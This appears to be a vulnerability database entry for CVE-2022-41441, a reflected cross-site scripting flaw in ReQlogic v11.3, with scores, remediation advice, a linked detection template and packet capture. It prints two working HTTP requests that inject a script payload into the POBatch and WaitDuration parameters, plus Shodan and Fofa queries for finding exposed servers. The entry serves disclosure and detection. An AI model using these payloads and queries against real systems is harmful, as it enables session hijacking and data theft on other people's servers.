🔙 목록으로 돌아가기

CVE-2022-41441: ReQlogic v11.3 - Cross Site Scripting

TitleReQlogic v11.3 - Cross Site Scripting
Authorr3Y3r53
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
RemediationApply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ReQlogic v11.3.
CVSS Score6.1
EPSS Score0.0698
CVE IDCVE-2022-41441
CWE IDCWE-79
Shodan Queryhttp.html:"ReQlogic"http.html:"reqlogic"
Fofa Querybody="reqlogic"
Tags cve cve2022 packetstorm xss reqlogic vuln

🔍 Vulnerability Description

ReQlogic v11.3 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the POBatch and WaitDuration parameters.

🌐 HTTP Request

GET /ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(document.domain)</script> HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /ProcessWait.aspx?POBatch=</script><script>alert(document.domain)</script>&WaitDuration=3 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-41441.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-41441.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A